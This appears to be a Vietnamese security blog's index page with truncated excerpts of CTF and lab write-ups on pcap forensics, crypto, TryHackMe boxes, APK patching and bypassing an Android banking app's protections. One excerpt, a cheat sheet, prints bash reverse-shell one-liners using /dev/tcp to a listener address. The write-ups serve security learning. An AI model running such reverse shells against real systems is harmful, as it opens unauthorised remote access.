Trong bài này anh Tsu cho chúng ta một file code: Phân tích source code ta thấy bot sẽ querry theo các thông tin có sẵn trong các array và in ra theo điều kiện đầu vào. Để có được flag, ta cần phả...

My note for quick to use in HackTheBox, TryHackme, VulnBox,… Reverse shell Bash $ bash -i >& /dev/tcp/10.0.0.1/9001 0>&1 $ 0<&196;exec 196<>/dev/tcp/10.0.0.1/9001; sh ...

listening? Chúng ta có đề bài là một file pcap. Sau khi nhìn tổng quan thì tất cả các package đều chỉ chung về việc truy cập OAUTH2 của google kèm theo đó là các biến client_secret; refresh_token;...

fibinary Bài này chúng ta có source code encrypt: fib = [1, 1] for i in range(2, 11): fib.append(fib[i - 1] + fib[i - 2]) def c2f(c): n = ord(c) b = '' for i in range(10, -1, -1): if n >...

Bài này cho chúng ta 1 vuln box trên tryhackme và nhiệm vụ là phải cat được flag trong root folder. Đầu tiên, mình dùng nmap để xem các port đang mở trên box này. $ nmap -vv -sV -sT -sC 10.10.164....

Dịch giặc hoành hành, nên mình có thời gian thêm ở nhà làm việc và research một vài thứ mới, hay ho và để bổ sung kiến thức. Mã hóa là một phần của CTF và ATTT; nên mình quyết định học crypto làm c...

Vài hôm trước mình có được một người anh nhờ reverse và bypass các tính năng bảo mật cho ứng dụng của ngân hàng MQĐ trên Android; cũng lâu rồi chưa làm gì đụng lại đến Android nên mình thấy đây là ...

Cách mình patch code và nghịch ngợm 1 file APK. 0x01: Các công cụ cần thiết: Các bạn tải những công cụ: apktool_Công cụ giúp chúng ta decompile từ 1 file APK sang mã nguồn smali và Recompile t...

Một bài chia sẻ, tổng hợp kiến thức cá nhân giúp mình hoàn thành các thử thách truyền thông tin sử dụng giao thức USB sang PC/Laptop được capture thông qua Wireshark hoặc T-shark và lưu dưới tệp ti...

0x01: Ứng cứu sự cố, điều tra số 1. Time2Attack Trong bài này, ban tổ chức (BTC) cung cấp 1 file pcap. Sau khi mở bằng wireshark ta có 1 file zip với tên time.zip. Nhận thấy đây là 1 file zip yêu...